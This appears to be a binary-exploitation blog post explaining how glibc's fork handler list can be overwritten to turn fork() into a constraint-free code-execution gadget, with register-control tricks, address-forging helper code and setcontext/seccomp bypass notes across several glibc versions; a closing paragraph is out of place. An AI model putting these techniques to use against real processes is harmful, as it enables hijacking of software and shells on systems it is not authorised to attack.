fork_handlers
The forgotten brother of __exit_funcs
Some of you may be familiar with the exit handlers, which are run when calling exit(). These are typically used to clean up before the program terminates, but they're also quite useful for attackers looking to hijack code execution. They're ideal because, by overwriting the __exit_funcs array, you can specify functions to be called, along with a controlled argument. One downside is that, because they're popular with attackers, glibc applies pointer mangling to the function pointers.
However, there are other places where handlers like these are used. One that I stumbled across while investigating the exit handlers was the fork handlers, and after some digging I found some tricks to abuse them to convert fork into a constraintless one gadget.
fork has its own handlers for multiple situations:
prepare_handler
parent_handler
child_handler
These are stored in a single array/linked list called fork_handlers, which exists in a writable region of libc memory so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specific order. There are a few things that separate these from exit handlers:
No pointer mangling.
No argument control.
So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are similar tricks to what we did in ret2gets. To see that, let's have a closer look at fork across multiple versions, as the implementation of the handlers has changed, which also changes how we'd abuse them.
(The specific version used here is 2.35.)
Let's first have a look at what a fork_handler looks like:
prepare_handler: Handlers to prepare the process to fork, so they're run before the fork.
parent_handler: Handlers run as the parent after the fork.
child_handler: Handlers run as the child after the fork.
dso_handle: A unique id to identify which binary/shared library registered this handler.
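As a minimal sketch of how one such entry could be serialised for an arbitrary write, the snippet below packs the four fields as little-endian 64-bit words. The field order follows the list above; the 0x20-byte size, the helper name pack_fork_handler and the address are assumptions for x86-64, not taken from the original listing.

```python
import struct

FORK_HANDLER_SIZE = 0x20  # assumed: four 8-byte fields on x86-64


def pack_fork_handler(prepare=0, parent=0, child=0, dso_handle=0):
    """Serialise one fork_handler entry as four little-endian 64-bit words."""
    return struct.pack("<4Q", prepare, parent, child, dso_handle)


# Placeholder address, purely for illustration.
entry = pack_fork_handler(prepare=0x7FFFF7E12340)
print(len(entry) == FORK_HANDLER_SIZE)
print(entry.hex())
```

A NULL (zero) field simply means "no handler of this type" for that entry.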
These are stored in an array called fork_handlers, which is defined as:
The way this definition works is by stating a few "parameters" using macros, then including malloc/dynarray-skeleton.c, which then defines a struct called fork_handler_list, plus a bunch of helper functions for this struct.
These dynarray structures are dynamically allocated arrays, which can resize if needed. Usually they start out in an initial inline buffer and only move to the heap once they outgrow it. Evaluating this yields:
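As a rough model of the resulting layout: the used field is the one discussed in this post, while allocated, array, the 0x18-byte header and the 48-entry inline buffer are my recollection of dynarray-skeleton.c and should be treated as assumptions to verify against your libc. The helper names and the address are hypothetical.

```python
import struct

HEADER_SIZE = 0x18   # assumed: used + allocated + array, 8 bytes each
INITIAL_SIZE = 48    # assumed DYNARRAY_INITIAL_SIZE for fork_handlers


def pack_header(used, allocated, array):
    """Serialise the three header words of the modelled fork_handler_list."""
    return struct.pack("<3Q", used, allocated, array)


def fresh_list(list_address):
    """Header of an empty list whose array pointer targets the inline buffer."""
    return pack_header(0, INITIAL_SIZE, list_address + HEADER_SIZE)


header = fresh_list(0x7FFFF7FA1000)  # placeholder address
used, allocated, array = struct.unpack("<3Q", header)
print(used, allocated, hex(array))
```

The point for exploitation is that used and array sit next to each other in writable memory, so a single write can replace both.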
fork is defined as follows:
Here we call __run_fork_handlers with atfork_run_prepare, indicating it wants to execute the prepare handlers.
So now it will go through the array from the last element (for backwards compatibility reasons), executing each prepare_handler if it exists. The methods fork_handler_list_size and fork_handler_list_at are some of the methods automatically defined when we defined fork_handler_list, which just get the length (used) and index the array respectively. Locking may also be used, if there are multiple threads running.
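The traversal order matters when several handlers are chained, so here is a simplified Python model of the loop described above. It ignores locking and represents handlers as dicts, which is purely an illustration choice.

```python
def run_prepare_handlers(handlers):
    """Call each entry's prepare handler, walking from the last entry to the first."""
    for index in range(len(handlers), 0, -1):
        prepare = handlers[index - 1].get("prepare")
        if prepare is not None:  # NULL handlers are skipped
            prepare()


calls = []
handlers = [
    {"prepare": lambda: calls.append("first registered")},
    {"prepare": None},
    {"prepare": lambda: calls.append("last registered")},
]
run_prepare_handlers(handlers)
print(calls)
```

In other words, whatever should run first has to be placed last in a forged array.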
At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.
First it checks the first argument edi, and if it's 0, then it means it should run the prepare handlers. It then checks whether it should use locking; if so, it jumps to +288, where it will lock, then resumes by jumping back to +23.
But then something interesting happens. [fork_handlers] (which corresponds to fork_handlers->used) is loaded into rbp, then into rdi. How interesting! It then goes on to call the prepare_handler:
So theoretically, controlling the used field could grant us rdi control.
The reason for this is the same reason why ret2gets works. Let's go back to +84 (when the index is decremented):
+91 checks that the index rbp is within the bounds of the array (less than used). If it's not, then it goes on to call __libc_dynarray_at_failure, interestingly setting a second argument, but not a first? Well, that's because it already set the first argument when used was loaded. It could load used into any register, but the compiler chooses rdi because, in the case where this error happens, it doesn't need to waste time loading it into rdi again: it's already there.
To demonstrate this, we'll use the very realistic application attack scenario above, where we have a libc leak, an arbitrary write, and a call to fork we want to hijack.
We can start by writing some basic methods to create the structures:
So we can use handler_array(libc.sym.system) to craft an array that will execute system, but we now need to control rdi. We can do this by setting used to some pointer to /bin/sh. However, if we use a regular address to point to the handler array, then the large used field will cause it to access invalid memory, as it will access the last handler (index used - 1). So if we need used to be an address, why don't we just alter the address of the handler array? As long as the element at index used - 1 points to our handler, it'll work. We can forge such an address as follows:
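A minimal sketch of that arithmetic, assuming a 0x20-byte fork_handler and 64-bit wrap-around in the index calculation. The function names and both addresses are hypothetical placeholders.

```python
MASK64 = (1 << 64) - 1
HANDLER_SIZE = 0x20  # assumed sizeof(struct fork_handler) for 2.28-2.35


def forge_array_pointer(used, handler_addr):
    """Array base such that element used-1 lands exactly on handler_addr."""
    return (handler_addr - (used - 1) * HANDLER_SIZE) & MASK64


def last_element(array, used):
    """Address the loop dereferences first: &array[used - 1], modulo 2**64."""
    return (array + (used - 1) * HANDLER_SIZE) & MASK64


binsh = 0x7FFFF7F5A678         # placeholder: pointer we want in rdi
fake_handler = 0x7FFFF7FA2000  # placeholder: where our forged entry lives
array = forge_array_pointer(binsh, fake_handler)
print(hex(array))
print(last_element(array, binsh) == fake_handler)
```

Only the last element is ever dereferenced in this scenario, so the wrapped base address never needs to be mapped.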
Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless __register_atfork or __unregister_atfork is used). Putting this all together, we can arrive at the following exploit:
This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to execve, meaning calling system is useless now! Is that all we can do with a function call with a controlled argument? Yes, thanks for reading.
This is where setcontext comes in! I covered this already here, but basically this allows us to get ROP through the use of a function resembling the sigreturn syscall. We can substitute this in as follows:
For demo purposes, I'm just executing execve, but you can do much more with setcontext.
Both of these examples require the /bin/sh string or the SigreturnFrame to already exist in memory, or be a part of the arbitrary write. But what if we don't have such a luxury? Well, since rdi will be controlled for every function call, we can use gets to write data to the argument, before using it for system:
Or setcontext:
Our good old friend (well, enemy) seccomp isn't always easily defeated by setcontext, because there's a nuisance I have yet to cover. If we have another look at setcontext:
We see that it executes a syscall before it sets the context, with syscall number 0xe. This is rt_sigprocmask, and while it may not be on the radar of any blacklists, it could easily be left out of a whitelist (like seccomp's strict mode), meaning this could invoke seccomp's wrath.
What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the context through the pointer held in rdx, not rdi, so we'd need to control rdx somehow.
Wouldn't it be nice if we could convert our current rdi control into rdx control, given that rdx isn't used by __run_fork_handlers? Well, it turns out there is a gadget that can do just that!
Exactly one in fact. However if you're anything like me (and I surely hope not), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).
It seems to belong to a function __memset_erms, which in hindsight makes sense. It explains the rep stos instruction: it's filling the buffer with the character al. And since rep stos increments rdi, it needs to save a copy, so that it can return that original pointer, as that's the defined behaviour of memset.
But why did it compile like this, and why is rdx used? Surely this could change, right? Well, let's find out:
Turns out the reason it compiled that way is because that's exactly how libc wanted it: it's written in assembly language (.S is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it:
It's simple, so not much to change in the first place.
If it ain't broke, don't fix it.
It's not actually used, it's just used for performance measuring.
Fantastic, we have a mov rdx, rdi gadget! But one final snag: we ideally want to set rcx or rdx to 0 before this gadget executes, so that rep stos finishes immediately (i.e. doesn't run).
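To see why a zero count makes the gadget harmless, here is a small register-level model. It assumes the gadget is the tail of __memset_erms in the form mov rdx, rdi; rep stosb; mov rax, rdx; ret, which is inferred from the description above rather than copied from a disassembly. Memory is modelled as a dict of byte addresses.

```python
def memset_erms_tail(regs, memory):
    """Model of: mov rdx, rdi ; rep stosb ; mov rax, rdx ; ret."""
    regs["rdx"] = regs["rdi"]            # save the original destination
    while regs["rcx"] != 0:              # rep stosb: store al, rcx times
        memory[regs["rdi"]] = regs["rax"] & 0xFF
        regs["rdi"] += 1
        regs["rcx"] -= 1
    regs["rax"] = regs["rdx"]            # memset returns the original pointer
    return regs


memory = {}
regs = memset_erms_tail({"rdi": 0x1000, "rcx": 0, "rax": 0x41, "rdx": 0}, memory)
print(hex(regs["rdx"]), memory)
```

With rcx at 0 nothing is written and rdx ends up holding the old rdi, which is the only effect we want from the gadget.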
Putting this all together, we arrive at the following:
There's a weird edge case that I found with 2.28-2.29, which seems to coincide with the versions that didn't have the do_locking argument (which was added in 2.30).
Above we see that the used field is loaded into rax, but not into rdi. But after the first call:
used is loaded into rdi. Weird...
I can't quite explain why this happens, but this is more just a word of warning that this isn't an exact science. If you find this happening, you can always just start with a handler that points to a ret gadget to get past the first call, which would also be compatible with 2.30+.
And if it doesn't happen at all?
Well, rdi shouldn't be used by anything else if it's not used for used, so ret2gets would also be a possibility; however, I have yet to test it.
(The specific version used here is 2.39.)
You'll have noticed that the previous section was specifically for 2.28-2.35. This is because the implementation of fork_handlers changes throughout the versions. So, what's changed now?
Well, not much actually. Firstly, the fork_handler struct has a new field: id.
And a separate function for running prefork handlers has been created:
The function for running prefork handlers isn't much different either:
The main addition is the use of id. What seems to be implied by the comments here is that each handler now has a unique id, which increments each time a new one is added. This means ones added later will have a larger id. Due to the different locking pattern here, handlers could be deregistered and/or registered while a prepare_handler is being executed, so the loop ensures that only handlers that were registered before the one that just ran are executed, skipping any with a higher id.
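The id check is easier to follow with a small simulation. The model below is a simplified Python rendering of the behaviour described above, based on my reading of the glibc loop (it skips entries whose id is greater than or equal to the one just run). Locking is omitted, and the handler names and the churn scenario are made up for illustration.

```python
def run_prefork_handlers(handlers):
    """Walk the list from the end; after each call, skip entries whose id is
    not lower than the handler that just ran (the list may have changed)."""
    i = len(handlers)
    while i > 0:
        current = handlers[i - 1]
        current_id = current["id"]
        if current["prepare"] is not None:
            current["prepare"]()
        i -= 1
        while i > 0 and handlers[i - 1]["id"] >= current_id:
            i -= 1


calls = []
handlers = []


def make(name, ident, side_effect=None):
    def prepare():
        calls.append(name)
        if side_effect is not None:
            side_effect()
    return {"name": name, "id": ident, "prepare": prepare}


def churn():
    del handlers[0]                # simulate deregistering A ...
    handlers.append(make("D", 4))  # ... and registering D during C's handler


handlers.extend([make("A", 1), make("B", 2), make("C", 3, churn)])
run_prefork_handlers(handlers)
print(calls)
```

After C runs, the list has shifted to B, C, D. The id comparison stops C from running twice and keeps the newly added D out of this fork.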
For us, all this changes is that the structure of fork_handler is different, and we just need to include an id field that increases with each handler. The updated handlers are as follows:
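A hedged sketch of what such helpers could look like with only the standard library. It assumes id is a 64-bit field placed after dso_handle, giving the 0x28-byte entry size mentioned later in this post. The function bodies are my own illustration, not the original listing.

```python
import struct

HANDLER_SIZE = 0x28  # assumed: four pointers plus a 64-bit id


def pack_fork_handler(prepare=0, parent=0, child=0, dso_handle=0, ident=0):
    """Serialise one entry, with the id as the fifth 64-bit word."""
    return struct.pack("<5Q", prepare, parent, child, dso_handle, ident)


def handler_array(prepare_addrs):
    """One entry per address; ids increase with the position in the array."""
    return b"".join(
        pack_fork_handler(prepare=addr, ident=index)
        for index, addr in enumerate(prepare_addrs)
    )


# Placeholder addresses; remember the last entry is called first.
blob = handler_array([0x401000, 0x402000])
print(len(blob) == 2 * HANDLER_SIZE)
```

Keeping the ids strictly increasing means the skip loop never discards one of our own entries.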
While these changes don't affect the regular cases for system("/bin/sh") or setcontext, they (indirectly) affect the setcontext case where we need to skip sigprocmask. In the version of glibc I used for the demo, rdx is used by __run_prefork_handlers:
Here we see at +128 that rdx=5*r14, where r14 is sl (the number of handlers). rdx then gets multiplied by 8, which ultimately means r14 got multiplied by 40/0x28 (the size of fork_handler). This is in preparation for the loop where it checks the id fields, which is why it actually points to the previous handler's id field (-0x30 instead of -0x28).
In this case, we can actually set used to a value that, when multiplied by 5, points to a context. This will make rdi a junk value, which means you can't use gets to populate the context (RIP), but apart from that, it's no problem!
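Finding such a value is a modular inverse problem: 5 is odd, so it is invertible modulo 2**64. The sketch below assumes rdx holds exactly 5*used (with 64-bit wrap-around) when the handler is called, as described above, and a 0x28-byte entry. The addresses and function names are placeholders, and pow with a negative exponent needs Python 3.8 or newer.

```python
MOD = 1 << 64
HANDLER_SIZE = 0x28       # assumed sizeof(struct fork_handler) in 2.39
INV5 = pow(5, -1, MOD)    # modular inverse of 5 modulo 2**64


def used_for_rdx(target):
    """Value of `used` such that 5 * used == target (mod 2**64)."""
    return (target * INV5) % MOD


def forge_array_pointer(used, handler_addr):
    """Array base such that element used-1 lands exactly on handler_addr."""
    return (handler_addr - (used - 1) * HANDLER_SIZE) % MOD


context = 0x7FFFF7FA3000       # placeholder: where the fake context lives
fake_handler = 0x7FFFF7FA2000  # placeholder: where the forged entry lives
used = used_for_rdx(context)
array = forge_array_pointer(used, fake_handler)
print(hex(used), hex(array))
print((used * 5) % MOD == context)
```

The resulting used is a huge junk number, which is exactly why rdi is no longer useful in this variant.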
(The specific version used here is 2.27.)
You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how fork_handlers is implemented and in how they're exploited: here we no longer have the rdi control trick through the used field.
fork_handler is now defined as:
A few more fields than before:
next: Points to the next handler, as __fork_handlers is now a singly linked list.
refcntr: Reference count of this handler.
need_signal: Unused in fork, so we'll ignore it.
We're no longer using a dynarray, so there is no used field to control to gain rdi control (cringe). Let's have a look at fork then:
Not much so far; it just checks THREAD_SELF to see whether the process is multi-threaded. There's also no separate function for handling the fork handlers anymore: it's incorporated into fork itself.
First it needs to access the root of the linked list of handlers: __fork_handlers. However, since the process could be multi-threaded and they didn't discover locking yet, it needs to do it in a thread-safe way (hence the weirdness with atomic_full_barrier etc.). The gist is that it will grab __fork_handlers if it exists, and (atomically) increment the refcntr to claim ownership of it, ensuring it doesn't get freed while it's in use here.
A lock doesn't seem to be needed, as the fork_handler entries are constant (besides refcntr, which is handled atomically and is therefore not susceptible to racing). While it does work, the code with locking is just nicer.
This now seems familiar, but instead of accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can use the same ones later for parent_handler and child_handler. To do this, it needs to claim ownership, so it increments the refcntr.
Importantly, there are no function calls with arguments present here, except for alloca (compiler builtin) and atomic_increment (asm block). So unlike 2.28+, there's no rdi control, because no functions (with a first argument) are called.
We can write methods to forge a fork_handler list as follows:
You can do a standard array (forge), or you can utilise the unused space to pack it as much as possible (forge_packed). Both must contain at least the first refcntr though, as we need to ensure that it is non-zero. The rest of the refcntrs will be incremented, and if these are outside our data, they might corrupt other data, but if that's not a concern, then you can use smallest=True.
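As a hedged illustration of the unpacked variant, the sketch below lays out a chain of entries contiguously. The field order (next, the three handlers, dso_handle, then refcntr and need_signal as 32-bit integers) is my recollection of the 2.27 struct and should be checked against your libc. forge_list is a hypothetical stand-in, not the forge or forge_packed helpers mentioned above.

```python
import struct

HANDLER_SIZE = 0x30  # assumed: five pointers plus two 32-bit integers


def pack_handler(next_ptr=0, prepare=0, parent=0, child=0,
                 dso_handle=0, refcntr=1, need_signal=0):
    """Serialise one 2.27-style entry; refcntr defaults to a non-zero value."""
    return struct.pack("<5QIi", next_ptr, prepare, parent, child,
                       dso_handle, refcntr, need_signal)


def forge_list(base, prepare_addrs):
    """Chain entries stored back to back at `base`, in call order."""
    blob = b""
    for index, addr in enumerate(prepare_addrs):
        is_last = index == len(prepare_addrs) - 1
        next_ptr = 0 if is_last else base + (index + 1) * HANDLER_SIZE
        blob += pack_handler(next_ptr=next_ptr, prepare=addr)
    return blob


# Placeholder addresses for illustration only.
blob = forge_list(0x7FFFF7FA2000, [0x401000, 0x402000])
print(len(blob) == 2 * HANDLER_SIZE)
```

Unlike the array versions, the list is walked from its head, so the entries are written in the order they should be called.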
Therefore the only way we can control rdi is through prepare_handler calls. We need a function that will populate rdi with some writable address, which we could then write to using gets. ret2gets is unfortunately not very applicable here, as it's quite limited prior to 2.30 (see here).
Thankfully, I was able to find an alternative: rand.
rand is a pseudo-random number generator, and with that comes the need to keep track of the random state. In this case, that state is unsafe_state, which is of type random_data:
Well that's a good question, because we've seen before (in ret2gets) that locking lock can result in lock being loaded into rdi.
Ah, it's our good ol' friend lll_unlock.
Just like in ret2gets prior to 2.30, it only unlocks by using __lll_unlock_wake_private when it's multi-threaded, thus the single-threaded case works flawlessly and doesn't touch rdi.
The multi-threaded case is a bit more complex, but if it's locked with the value LLL_LOCK_INITIALIZER_LOCKED (1), then it also doesn't touch rdi (yay). However, lock can also contain the value LLL_LOCK_INITIALIZER_WAITERS (2), in which case the dec won't result in 0, and it will execute __lll_unlock_wake_private, thus clobbering rdi.
This should be unlikely to happen to rand's lock, as you'd need multiple threads trying to access rand at the same time, but it's not impossible, so be careful.
So let's go back to random, specifically __random_r. We can use rand followed by gets to write to the unsafe_state, but we'll need to call rand again to put unsafe_state back into rdi after gets. And if we call rand using a corrupted unsafe_state, then we could cause a crash?
So we need to conform to random_data:
But this contains multiple pointers, including at the beginning, where we might want to put the /bin/sh string for example! But are these always used? Let's check __random_r:
At first glance, we can see the fptr, rptr, and state pointers being used in the else clause. However, there's an interesting case: buf->rand_type == TYPE_0. This seems to be much simpler, and doesn't use fptr or rptr! It does still use state, but as long as it's populated with a writable address, it won't SEGFAULT. The default rand_type is TYPE_3, but we can easily overwrite it to TYPE_0.
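For reference, the TYPE_0 branch is a plain linear congruential step on state[0]. The model below uses the constants as I remember them from glibc's __random_r (multiplier 1103515245, increment 12345, 31-bit mask), so treat them as an assumption to confirm in your source tree. The function name is hypothetical.

```python
def type0_step(state0):
    """One TYPE_0 step: the value is both the result and the new state[0]."""
    return (state0 * 1103515245 + 12345) & 0x7FFFFFFF


value = type0_step(1)
print(value)
print(type0_step(value))
```

The only memory access is a read and a write of one 32-bit word through state, which is why any writable address is good enough there.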
Putting this together, we arrive at the following for system("/bin/sh"):
We're also able to use this for setcontext:
This time our work is actually mostly done for us, because in 2.27 and prior, setcontext doesn't use rdx for the ucontext.
So it's just as simple as jumping to setcontext+37 (or later).
It can be quite cumbersome to check the disassembly to see what the arguments are going to be ahead of time. That's why I wrote a script, just like with ret2gets, which will trace fork with angr, and log what the arguments to each call to prepare_handler were.
So why would we care about this? I mean sure, we can control fork to either execute system for a shell, or setcontext for ROP/shellcode, but that's only useful if there are calls to fork. Not all applications will use fork after all.
What about functions in glibc? Surely some of them will use fork; after all, there are functions like system which would create a new process to execute a shell command, right?
Well, unfortunately not many glibc functions use __libc_fork.
_IO_old_popen (not used)
vfork (if the vfork syscall doesn't exist)
The rest, like system or popen, will use an inlined clone call.
Well, like I mentioned in the beginning, by overwriting fork_handlers, we have effectively turned fork into a one_gadget. However, this has a few benefits over a regular one_gadget:
No constraints.
Can trigger ROP.
So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful.
However, a lot of what's been done here can also be done with exit, and more easily as well, as that has explicit argument control. The only downside there is that you have to deal with pointer mangling too.
In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :)
This state is passed to __random_r as the first argument. What's more, __random_r is relatively simple: it doesn't make any function calls or alter the pointer itself, which means that it can just keep unsafe_state in rdi (we'll look at this in a bit).